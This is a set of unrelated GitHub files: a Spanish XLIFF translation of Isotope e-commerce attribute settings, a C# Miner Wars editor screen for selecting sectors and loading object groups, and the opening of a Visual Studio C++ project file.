id="tl_iso_attribute.placeholder.1"> <source>Show this text as long as the field is empty (requires HTML5).</source> </trans-unit> <trans-unit id="tl_iso_attribute.minlength.0"> <source>Minimum length</source> </trans-unit> <trans-unit id="tl_iso_attribute.minlength.1"> <source>Require the field value to be a certain number of characters (text) or bytes (file uploads).</source> </trans-unit> <trans-unit id="tl_iso_attribute.maxlength.0"> <source>Maximum length</source> <target>Longitud máxima</target> </trans-unit> <trans-unit id="tl_iso_attribute.maxlength.1"> <source>Limit the field length to a certain number of characters (text) or bytes (file uploads).</source> <target>Limitar la longitud de campo a un cierto número de caracteres (texto) o bytes (subida de archivos).</target> </trans-unit> <trans-unit id="tl_iso_attribute.foreignKey.0"> <source>Foreign table &amp; field</source> <target>Tabla y campo exterior</target> </trans-unit> <trans-unit id="tl_iso_attribute.foreignKey.1"> <source>Instead of adding options you can enter a table.field combination to select from database. To use multilingual foreignKeys, enter one per line and specify the language (example: en=tl_table.field)</source> <target>En lugar de añadir opciones, puede introducir una combinación tabla.campo para seleccionar en la base de datos. Para utilizar las claves externas multilingües, introduzca una por línea y especifique el idioma (ejemplo: en = tl_table.field)</target> </trans-unit> <trans-unit id="tl_iso_attribute.conditionField.0"> <source>Parent field</source> <target>Campo padre</target> </trans-unit> <trans-unit id="tl_iso_attribute.conditionField.1"> <source>Please select the parent field, which must be of type &quot;Select-Menu&quot;. For parent-child relation to work, define each option of this parent field as group of the conditional select-menu.</source> <target>Por favor, seleccione el campo padre, que debe ser de tipo &quot;Select-Menu&quot;. Para que funcione la relación padre-hijo, definir cada opción de este campo padre como el grupo del Select-Menu condicional.</target> </trans-unit> <trans-unit id="tl_iso_attribute.files.0"> <source>Show files</source> <target>Mostrar archivos</target> </trans-unit> <trans-unit id="tl_iso_attribute.files.1"> <source>Show both files and folders.</source> <target>Mostrar archivos y carpetas.</target> </trans-unit> <trans-unit id="tl_iso_attribute.filesOnly.0"> <source>Files only</source> <target>Archivos sólo</target> </trans-unit> <trans-unit id="tl_iso_attribute.filesOnly.1"> <source>Remove the radio buttons or checkboxes next to folders.</source> <target>Retire los botones de opción o casillas junto a las carpetas.</target> </trans-unit> <trans-unit id="tl_iso_attribute.isGallery.0"> <source>Mark as gallery</source> </trans-unit> <trans-unit id="tl_iso_attribute.isGallery.1"> <source>Mark the attribute as image gallery which allows for better display in the backend.</source> </trans-unit> <trans-unit id="tl_iso_attribute.fieldType.0"> <source>Field type</source> <target>Tipo de campo</target> </trans-unit> <trans-unit id="tl_iso_attribute.fieldType.1"> <source>Display radio buttons or checkboxes next to folders.</source> <target>Mostrar botones de opción o casillas junto a las carpetas.</target> </trans-unit> <trans-unit id="tl_iso_attribute.sortBy.0"> <source>Order by</source> <target>Ordenar por</target> </trans-unit> <trans-unit id="tl_iso_attribute.sortBy.1"> <source>Please choose the sort order.</source> <target>Por favor, elija el orden de clasificación.</target> </trans-unit> <trans-unit id="tl_iso_attribute.path.0"> <source>Root directory</source> <target>Directorio raíz</target> </trans-unit> <trans-unit id="tl_iso_attribute.path.1"> <source>You can limit the file tree by defining a root directory here.</source> <target>Puede limitar el árbol de archivos mediante la definición de un directorio raíz aquí.</target> </trans-unit> <trans-unit id="tl_iso_attribute.storeFile.0"> <source>Store uploaded files</source> <target>Guardar los archivos subidos</target> </trans-unit> <trans-unit id="tl_iso_attribute.storeFile.1"> <source>Move the uploaded files to a folder on the server.</source> <target>Mover los archivos subidos a una carpeta en el servidor.</target> </trans-unit> <trans-unit id="tl_iso_attribute.uploadFolder.0"> <source>Target folder</source> <target>Carpeta de destino</target> </trans-unit> <trans-unit id="tl_iso_attribute.uploadFolder.1"> <source>Please select the target folder from the files directory.</source> <target>Por favor, seleccione la carpeta de destino en el directorio de archivos.</target> </trans-unit> <trans-unit id="tl_iso_attribute.useHomeDir.0"> <source>Use home directory</source> <target>Utilice el directorio home</target> </trans-unit> <trans-unit id="tl_iso_attribute.useHomeDir.1"> <source>Store the file in the home directory if there is an authenticated user.</source> <target>Guardar el archivo en el directorio home si hay un usuario autentificado.</target> </trans-unit> <trans-unit id="tl_iso_attribute.doNotOverwrite.0"> <source>Preserve existing files</source> <target>Preservar los archivos existentes</target> </trans-unit> <trans-unit id="tl_iso_attribute.doNotOverwrite.1"> <source>Add a numeric suffix to the new file if the file name already exists.</source> <target>Agregar un sufijo numérico para el nuevo archivo si ya existe el nombre del archivo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutRelocate.0"> <source>Move file(s) after checkout</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutRelocate.1"> <source>Re-organize files after an order has been completed.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFolder.0"> <source>Target folder</source> <target>Carpeta de destino</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFolder.1"> <source>Enter the target path relative to Contao root. Use simple tokens and insert tags to generate a dynamic name (see help wizard).</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFile.0"> <source>Target file name</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkoutTargetFile.1"> <source>Enter the target file name. Use simple tokens and insert tags to generate a dynamic name (see help wizard).</source> </trans-unit> <trans-unit id="tl_iso_attribute.fe_sorting.0"> <source>Add to &quot;Order By&quot; option list</source> <target>Añadir a la lista de opciones &quot;Ordenar por&quot;</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_sorting.1"> <source>This field will be sortable in the listing module provided the attribute is visible to customers.</source> <target>Este campo se puede ordenar en el módulo de la lista proporcionando el atributo visible para los clientes.</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_filter.0"> <source>Backend filterable</source> <target>Filtrable Backend</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_filter.1"> <source>Can this attribute be used in a backend filter?</source> <target>¿Este atributo puede ser utilizado en un filtro de backend?</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_search.0"> <source>Backend searchable</source> <target>Búsqueda Backend</target> </trans-unit> <trans-unit id="tl_iso_attribute.be_search.1"> <source>Should the field be available in the backend search?</source> </trans-unit> <trans-unit id="tl_iso_attribute.fe_filter.0"> <source>Frontend filterable</source> <target>Filtrable frontend</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_filter.1"> <source>Can this attribute be used in a frontend filter?</source> <target>¿Este atributo puede ser utilizado en un filtro frontend?</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_search.0"> <source>Frontend searchable</source> <target>Búsqueda frontend</target> </trans-unit> <trans-unit id="tl_iso_attribute.fe_search.1"> <source>Should the search engine look in this field for search terms?</source> <target>¿Debe el motor de búsqueda buscar en este campo para los términos de búsqueda?</target> </trans-unit> <trans-unit id="tl_iso_attribute.datepicker.0"> <source>Date picker</source> <target>Selector de fecha</target> </trans-unit> <trans-unit id="tl_iso_attribute.datepicker.1"> <source>Show a date picker for this field.</source> <target>Mostrar un selector de fecha para este campo.</target> </trans-unit> <trans-unit id="tl_iso_attribute.chunking.0"> <source>Enable chunking</source> </trans-unit> <trans-unit id="tl_iso_attribute.chunking.1"> <source>Enable the file chunking. It is useful to upload big files.</source> </trans-unit> <trans-unit id="tl_iso_attribute.chunkSize.0"> <source>Chunk size in bytes</source> </trans-unit> <trans-unit id="tl_iso_attribute.chunkSize.1"> <source>Please enter the chunk size in bytes (1MB = 1000000 bytes).</source> </trans-unit> <trans-unit id="tl_iso_attribute.optionsTable_edit"> <source>Edit options</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkbox"> <source>Checkbox</source> <target>Casilla</target> </trans-unit> <trans-unit id="tl_iso_attribute.radio"> <source>Radio</source> <target>Opción</target> </trans-unit> <trans-unit id="tl_iso_attribute.digit.0"> <source>Numeric characters</source> <target>Caracteres numéricos</target> </trans-unit> <trans-unit id="tl_iso_attribute.digit.1"> <source>Allows numeric characters, minus (-), full stop (.) and space ( ).</source> <target>Permite caracteres numéricos, menos (-), punto (.) y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.alpha.0"> <source>Alphabetic characters</source> <target>Caracteres alfabéticos</target> </trans-unit> <trans-unit id="tl_iso_attribute.alpha.1"> <source>Allows alphabetic characters, minus (-), full stop (.) and space ( ).</source> <target>Permite caracteres alfabéticos, menos (-), punto (.) y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.alnum.0"> <source>Alphanumeric characters</source> <target>Caracteres alfanuméricos</target> </trans-unit> <trans-unit id="tl_iso_attribute.alnum.1"> <source>Allows alphabetic and numeric characters, minus (-), full stop (.), underscore (_) and space ( ).</source> <target>Permite caracteres alfanuméricos, menos (-), punto (.) y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.extnd.0"> <source>Extended alphanumeric characters</source> <target>Caracteres alfanuméricos extendidos</target> </trans-unit> <trans-unit id="tl_iso_attribute.extnd.1"> <source>Allows everything except special characters which are usually encoded for security reasons (#/()&lt;=&gt;).</source> <target>Permite todo excepto caracteres especiales que generalmente están codificados por razones de seguridad (#/()&lt;=&gt;).</target> </trans-unit> <trans-unit id="tl_iso_attribute.date.0"> <source>Date</source> <target>Fecha</target> </trans-unit> <trans-unit id="tl_iso_attribute.date.1"> <source>Checks whether the input matches the global date format.</source> <target>Comprueba si la entrada coincide con el formato de fecha global.</target> </trans-unit> <trans-unit id="tl_iso_attribute.time.0"> <source>Time</source> <target>Hora</target> </trans-unit> <trans-unit id="tl_iso_attribute.time.1"> <source>Checks whether the input matches the global time format.</source> <target>Comprueba si la entrada coincide con el formato de la hora global.</target> </trans-unit> <trans-unit id="tl_iso_attribute.datim.0"> <source>Date and time</source> <target>Fecha y Hora</target> </trans-unit> <trans-unit id="tl_iso_attribute.datim.1"> <source>Checks whether the input matches the global date and time format.</source> <target>Comprueba si la entrada coincide con el formato global de fecha y de hora.</target> </trans-unit> <trans-unit id="tl_iso_attribute.phone.0"> <source>Phone number</source> <target>Teléfono</target> </trans-unit> <trans-unit id="tl_iso_attribute.phone.1"> <source>Allows numeric characters, plus (+), minus (-), slash (/), parentheses () and space ( ).</source> <target>Permite caracteres numéricos, mas (+), menos (-), barra (/), paréntesis () y espacio ( ).</target> </trans-unit> <trans-unit id="tl_iso_attribute.email.0"> <source>E-mail address</source> <target>E-mail</target> </trans-unit> <trans-unit id="tl_iso_attribute.email.1"> <source>Checks whether the input is a valid e-mail address.</source> <target>Comprueba si la entrada es una dirección de correo electrónico válida.</target> </trans-unit> <trans-unit id="tl_iso_attribute.url.0"> <source>URL format</source> <target>Formato de URL</target> </trans-unit> <trans-unit id="tl_iso_attribute.url.1"> <source>Checks whether the input is a valid URL.</source> <target>Comprueba si la entrada es una URL válida.</target> </trans-unit> <trans-unit id="tl_iso_attribute.price.0"> <source>Price</source> <target>Precio</target> </trans-unit> <trans-unit id="tl_iso_attribute.price.1"> <source>Checks whether the input is a valid price.</source> <target>Comprueba si la entrada es un precio válido.</target> </trans-unit> <trans-unit id="tl_iso_attribute.discount.0"> <source>Discount</source> <target>Descuento</target> </trans-unit> <trans-unit id="tl_iso_attribute.discount.1"> <source>Checks whether the input is a valid discount.&lt;br /&gt;Example: -10%, -10, +10, +10%</source> <target>Comprueba si la entrada es un descuento válido &lt;br /&gt; Ejemplo:. -10%, -10, 10, +10%</target> </trans-unit> <trans-unit id="tl_iso_attribute.surcharge.0"> <source>Surcharge</source> <target>Recargo</target> </trans-unit> <trans-unit id="tl_iso_attribute.surcharge.1"> <source>Checks whether the input is a valid surcharge.&lt;br /&gt;Example: 10.00, 10%</source> <target>Comprueba si la entrada es un recargo válido &lt;br /&gt; Ejemplo:. 10.00, 10%</target> </trans-unit> <trans-unit id="tl_iso_attribute.custom"> <source>Custom order</source> </trans-unit> <trans-unit id="tl_iso_attribute.name_asc"> <source>File name (ascending)</source> <target>Nombre de archivo (ascendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.name_desc"> <source>File name (descending)</source> <target>Nombre de archivo (descendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.date_asc"> <source>Date (ascending)</source> <target>Fecha (ascendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.date_desc"> <source>Date (descending)</source> <target>Fecha (descendente)</target> </trans-unit> <trans-unit id="tl_iso_attribute.random"> <source>Random order</source> <target>Orden aleatorio</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.0"> <source>Use these simple tokens to generate a dynamic folder name.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.1.0"> <source>##document_number##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.1.1"> <source>Generated document number for the order.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.2.0"> <source>##order_id##</source> <target>##order_id##</target> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.2.1"> <source>Database ID of the order record.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.3.0"> <source>##order_date##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.3.1"> <source>Date of the order as timestamp. Use insert tags &lt;i&gt;{{formatted_datetime::*}}&lt;/i&gt; to convert timestamp to formatted date.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.4.0"> <source>##product_id##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.4.1"> <source>Database ID of the product.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.5.0"> <source>##product_sku##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.5.1"> <source>SKU of the product.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.6.0"> <source>##product_name##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.6.1"> <source>Name of the product.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.7.0"> <source>##product_position##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.7.1"> <source>Position of the product on the order document, starting from 1.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.8.0"> <source>##attribute_field##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.8.1"> <source>Database field name of the attribute.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.9.0"> <source>##attribute_name##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.9.1"> <source>Name of the attribute.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.10.0"> <source>##file_name##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.10.1"> <source>Full file name and extension as uploaded by the user.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.11.0"> <source>##file_target##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.11.1"> <source>Full file name and extension as uploaded by the user, but renamed if &quot;Preserve existing files&quot; is enabled and a file with same name exists in target folder. &lt;br&gt;&lt;strong&gt;Only available for the file name, not for the folder!&lt;/strong&gt;</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.12.0"> <source>##file_extension##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.12.1"> <source>The original file extension.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.13.0"> <source>##has_member##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.13.1"> <source>1 if a member is signed in to the frontend, 0 if not.</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.14.0"> <source>##member_*##</source> </trans-unit> <trans-unit id="tl_iso_attribute.checkout_tokens.14.1"> <source>If a user is logged in, all member fields are available as tokens.</source> </trans-unit> <trans-unit id="tl_iso_attribute.new.0"> <source>New attribute</source> <target>Nuevo atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.new.1"> <source>Create a new attribute.</source> <target>Crear un nuevo atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.edit.0"> <source>Edit attribute</source> <target>Editar atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.edit.1"> <source>Edit attribute ID %s.</source> <target>Editar atributo ID %s</target> </trans-unit> <trans-unit id="tl_iso_attribute.copy.0"> <source>Copy attribute</source> <target>Copiar atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.copy.1"> <source>Copy attribute ID %s.</source> <target>Copiar atributo ID %s</target> </trans-unit> <trans-unit id="tl_iso_attribute.delete.0"> <source>Delete attribute</source> <target>Borrar atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.delete.1"> <source>Delete attribute ID %s. The database column will not be deleted, you need to manually update the database using the install tool or repository manager.</source> <target>Borrar atributo ID %s. La columna de base de datos no será eliminada, es necesario actualizar manualmente la base de datos utilizando la herramienta de instalación o el repository manager.</target> </trans-unit> <trans-unit id="tl_iso_attribute.show.0"> <source>Attribute details</source> <target>Detalles de atributos</target> </trans-unit> <trans-unit id="tl_iso_attribute.show.1"> <source>Show details for attribute ID %s.</source> <target>Mostrar los detalles del atributo ID %s</target> </trans-unit> <trans-unit id="tl_iso_attribute.deleteConfirm"> <source>Do you really want to delete attribute ID %s? The database column will not be deleted, you need to manually update the database using the install tool or repository manager.</source> <target>¿Está seguro que quiere eliminar el atributo ID %s? La columna de la base de datos no será eliminada, es necesario actualizar manualmente la base de datos utilizando la herramienta de instalación o el repository manager.</target> </trans-unit> <trans-unit id="tl_iso_attribute.attribute_legend"> <source>Attribute name &amp; type</source> <target>Nombre y tipo de atributo </target> </trans-unit> <trans-unit id="tl_iso_attribute.description_legend"> <source>Description</source> <target>Descripción</target> </trans-unit> <trans-unit id="tl_iso_attribute.options_legend"> <source>Options</source> <target>Opciones</target> </trans-unit> <trans-unit id="tl_iso_attribute.config_legend"> <source>Attribute configuration</source> <target>Configuración del atributo</target> </trans-unit> <trans-unit id="tl_iso_attribute.search_filters_legend"> <source>Search &amp; Filtering Settings</source> <target>Opciones de Búsqueda y Filtrado</target> </trans-unit> <trans-unit id="tl_iso_attribute.store_legend"> <source>Store file</source> <target>Archivo de la tienda</target> </trans-unit> </body> </file> </xliff>
{ "pile_set_name": "Github" }
using System; using System.Collections.Generic; using System.Linq; using System.Text; using MinerWars.AppCode.Game.GUI.Core; using MinerWars.AppCode.Game.Localization; using MinerWars.CommonLIB.AppCode.Networking; using MinerWarsMath; using MinerWars.AppCode.Game.Utils; using MinerWars.AppCode.Game.World; using SysUtils.Utils; //using MinerWars.CommonLIB.MasterServerService; using System.IO; using MinerWars.CommonLIB.AppCode.ObjectBuilders; using System.Diagnostics; using MinerWars.AppCode.Networking.SectorService; using System.ServiceModel; namespace MinerWars.AppCode.Game.GUI.ScreenEditor { class MyGuiScreenEditorSelectSector : MyGuiScreenBase { MyGuiControlCombobox m_mapsCombobox; List<MyMwcSectorIdentifier> m_sectorIdentifiers; List<MyMwcUserDetail> m_userDetails; MyGuiControlTextbox m_findPlayerName; public MyGuiScreenEditorSelectSector() : base(new Vector2(0.5f, 0.5f), MyGuiConstants.SCREEN_BACKGROUND_COLOR, new Vector2(0.5f, 0.5f)) { m_enableBackgroundFade = true; m_sectorIdentifiers = null; RecreateControls(); } private void AddSectorToCombo(MyMwcSectorIdentifier sectorIdentifier, int index, string username) { if (string.IsNullOrEmpty(sectorIdentifier.SectorName)) { m_mapsCombobox.AddItem(index, new StringBuilder(string.Format("{0} ({1})", username, sectorIdentifier.Position.ToString()))); } else { m_mapsCombobox.AddItem(index, new StringBuilder(string.Format("{0} {1} ({2})", username, sectorIdentifier.SectorName, sectorIdentifier.Position.ToString()))); } } private void RecreateControls() { Controls.Clear(); AddCaption(new StringBuilder("Select Sector"), MyGuiConstants.SCREEN_CAPTION_TEXT_COLOR); Vector2 controlsOriginLeft = new Vector2(-m_size.Value.X / 2.0f + 0.04f, -m_size.Value.Y / 2.0f + 0.08f); Vector2 controlsDelta = new Vector2(0, 0.0525f); // controls for typing friend name to search Controls.Add(new MyGuiControlLabel(this, controlsOriginLeft + 1 * controlsDelta, null, MyTextsWrapperEnum.FriendName, MyGuiConstants.LABEL_TEXT_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiDrawAlignEnum.HORISONTAL_LEFT_AND_VERTICAL_CENTER)); m_findPlayerName = new MyGuiControlTextbox(this, controlsOriginLeft + 2 * controlsDelta + new Vector2(MyGuiConstants.TEXTBOX_MEDIUM_SIZE.X / 2.0f, 0), MyGuiControlPreDefinedSize.MEDIUM, "", 20, MyGuiConstants.TEXTBOX_BACKGROUND_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiControlTextboxType.NORMAL); Controls.Add(m_findPlayerName); // search button Controls.Add(new MyGuiControlButton(this, m_findPlayerName.GetPosition() + new Vector2(0.2f, 0), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Search, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnSearchClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true)); // friend maps available for selection Controls.Add(new MyGuiControlLabel(this, controlsOriginLeft + 4 * controlsDelta, null, MyTextsWrapperEnum.Map, MyGuiConstants.LABEL_TEXT_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiDrawAlignEnum.HORISONTAL_LEFT_AND_VERTICAL_CENTER)); if (m_sectorIdentifiers != null && m_userDetails != null) { m_mapsCombobox = new MyGuiControlCombobox(this, controlsOriginLeft + 5 * controlsDelta + new Vector2(MyGuiConstants.COMBOBOX_LONGMEDIUM_SIZE.X / 2.0f, 0), MyGuiControlPreDefinedSize.LONGMEDIUM, MyGuiConstants.COMBOBOX_BACKGROUND_COLOR, MyGuiConstants.COMBOBOX_TEXT_SCALE); for (int i = 0; i < m_sectorIdentifiers.Count; i++) { MyMwcSectorIdentifier sectorIdentifier = m_sectorIdentifiers[i]; if (!sectorIdentifier.UserId.HasValue) { AddSectorToCombo(sectorIdentifier, i, "STORY"); } else { foreach (MyMwcUserDetail userDetail in m_userDetails) { if (sectorIdentifier.UserId.HasValue && sectorIdentifier.UserId.Value == userDetail.UserId) { AddSectorToCombo(sectorIdentifier, i, userDetail.DisplayName); } } } } SortSectors(); m_mapsCombobox.SelectItemByIndex(0); Controls.Add(m_mapsCombobox); } else { Controls.Add(new MyGuiControlLabel(this, controlsOriginLeft + 5 * controlsDelta, null, MyTextsWrapperEnum.NoSectorsAvailable, MyGuiConstants.LABEL_TEXT_COLOR, MyGuiConstants.LABEL_TEXT_SCALE, MyGuiDrawAlignEnum.HORISONTAL_LEFT_AND_VERTICAL_CENTER)); } // Buttons OK and CANCEL Vector2 buttonDelta = new Vector2(0.1f, m_size.Value.Y / 2.0f - MyGuiConstants.MESSAGE_BOX_BORDER_AREA_Y - MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE.Y / 2.0f); if (m_mapsCombobox != null) { Controls.Add(new MyGuiControlButton(this, new Vector2(-buttonDelta.X, buttonDelta.Y), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Ok, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnOkClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true)); Controls.Add(new MyGuiControlButton(this, new Vector2(+buttonDelta.X, buttonDelta.Y), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Cancel, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnCancelClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true)); } else { Controls.Add(new MyGuiControlButton(this, new Vector2(0, m_size.Value.Y / 2.0f - MyGuiConstants.MESSAGE_BOX_BORDER_AREA_Y - MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE.Y / 2.0f), MyGuiConstants.MESSAGE_BOX_BUTTON_SIZE, MyGuiConstants.BUTTON_BACKGROUND_COLOR, MyTextsWrapperEnum.Cancel, MyGuiConstants.BUTTON_TEXT_COLOR, MyGuiConstants.BUTTON_TEXT_SCALE, OnCancelClick, MyGuiControlButtonTextAlignment.CENTERED, true, MyGuiDrawAlignEnum.HORISONTAL_CENTER_AND_VERTICAL_CENTER, true)); } } private void SortSectors() { // Named sectors first m_mapsCombobox.CustomSortItems((a, b) => { bool aName = string.IsNullOrEmpty(m_sectorIdentifiers[a.Key].SectorName); bool bName = string.IsNullOrEmpty(m_sectorIdentifiers[b.Key].SectorName); return aName == bName ? a.Value.ToString().CompareTo(b.Value.ToString()) : (aName ? 1 : -1); }); } public void AddSectorsResponse(List<MyMwcSectorIdentifier> sectorIdentifiers, List<MyMwcUserDetail> userDetails) { if (sectorIdentifiers != null && sectorIdentifiers.Count > 0) { m_sectorIdentifiers = sectorIdentifiers; m_userDetails = userDetails; RecreateControls(); } } public override string GetFriendlyName() { return "MyGuiScreenEditorSelectSector"; } public void OnSearchClick(MyGuiControlButton sender) { if (m_findPlayerName != null && m_findPlayerName.Text != null && m_findPlayerName.Text.Length > 0) { MyGuiManager.AddScreen(new MyGuiScreenSelectSandboxProgress(MyMwcSelectSectorRequestTypeEnum.FIND_BY_PLAYER_NAME, MyTextsWrapperEnum.LoadingPleaseWait, this, m_findPlayerName.Text, AddSectorsResponse)); } else { MyGuiManager.AddScreen(new MyGuiScreenSelectSandboxProgress(MyMwcSelectSectorRequestTypeEnum.STORY, MyTextsWrapperEnum.LoadingPleaseWait, this, null, AddSectorsResponse)); } } public void OnOkClick(MyGuiControlButton sender) { CloseScreen(); MyMwcSectorIdentifier sectorIdentifier = m_sectorIdentifiers[m_mapsCombobox.GetSelectedKey()]; MyGuiManager.AddScreen(new MyGuiScreenEditorLoadObjectGroupsProgress(MyTextsWrapperEnum.LoadingPleaseWait, sectorIdentifier)); } public void OnCancelClick(MyGuiControlButton sender) { CloseScreen(); MyGuiManager.AddScreen(new MyGuiScreenEditorGroups()); } } class MyGuiScreenEditorLoadObjectGroupsProgress : MyGuiScreenSectorServiceCallProgress { MyMwcSectorIdentifier m_sectorIdentifier; //MyMasterServerServiceClient client = MyMasterServerServiceClient.CreateInstance(); //System.IAsyncResult saveResult; // Using this static public property client-server tells us about login response public static MyGuiScreenEditorLoadObjectGroupsProgress CurrentScreen = null; // This is always filled with reference to actual instance of this scree. If there isn't, it's null. public MyGuiScreenEditorLoadObjectGroupsProgress(MyTextsWrapperEnum loadingText, MyMwcSectorIdentifier sectorIdentifier) : base(loadingText, false, TimeSpan.FromSeconds(360)) { CurrentScreen = this; m_sectorIdentifier = sectorIdentifier; } public override string GetFriendlyName() { return "MyGuiScreenEditorLoadObjectGroupsProgress"; } protected override void ServiceProgressStart(MySectorServiceClient client) { // Send save request and wait for callback AddAction(client.BeginLoadObjectGroups(m_sectorIdentifier.SectorType, m_sectorIdentifier.UserId, m_sectorIdentifier.Position, null, client)); } protected override void OnActionCompleted(IAsyncResult asyncResult, MySectorServiceClient client) { try { var response = client.EndLoadObjectGroups(asyncResult); List<MyMwcObjectBuilder_ObjectGroup> groups = new List<MyMwcObjectBuilder_ObjectGroup>(); List<MyMwcObjectBuilder_Base> entities = new List<MyMwcObjectBuilder_Base>(); var fakeEndpoint = new System.Net.IPEndPoint(0, MyClientServer.LoggedPlayer.GetUserId()); var sectorGroupBuilder = MyMwcObjectBuilder_Base.FromBytes<MyMwcObjectBuilder_SectorObjectGroups>(response); if (sectorGroupBuilder == null) { throw new InvalidOperationException("Cannot deserialize SectorObjectGroups object builder"); } MyGuiManager.AddScreen(new MyGuiScreenEditorLoadGroup(sectorGroupBuilder.Groups, sectorGroupBuilder.Entities)); } catch (Exception) { MyGuiManager.AddScreen(new MyGuiScreenMessageBox(MyMessageBoxType.ERROR, MyTextsWrapperEnum.PleaseTryAgain, MyTextsWrapperEnum.MessageBoxNetworkErrorCaption, MyTextsWrapperEnum.Ok, null)); } CloseScreen(); } public override bool Update(bool hasFocus) { if (base.Update(hasFocus) == false) return false; // Only continue if this screen is really open (not closing or closed) if (GetState() != MyGuiScreenState.OPENED) return false; return true; } public override bool CloseScreen() { bool ret = base.CloseScreen(); if (ret == true) { CurrentScreen = null; } return ret; } } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup Label="ProjectConfigurations"> <ProjectConfiguration Include="Debug|Win32"> <Configuration>Debug</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|x64"> <Configuration>Debug</Configuration> <Platform>x64</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Win32"> <Configuration>Release</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|x64"> <Configuration>Release</Configuration> <Platform>x64</Platform> </ProjectConfiguration> </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{87C164B2-7346-C612-4C6B-4927B29EFF9F}</ProjectGuid> <IgnoreWarnIntDirInTempDetected>true</IgnoreWarnIntDirInTempDetected> <IntDir>$(SolutionDir)IntDir\$(MSBuildProjectName)\</IntDir> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <PropertyGroup Condition="'$(VisualStudioVersion)' == '10.0'" Label="Configuration"> <PlatformToolset>v100</PlatformToolset> </PropertyGroup> <PropertyGroup 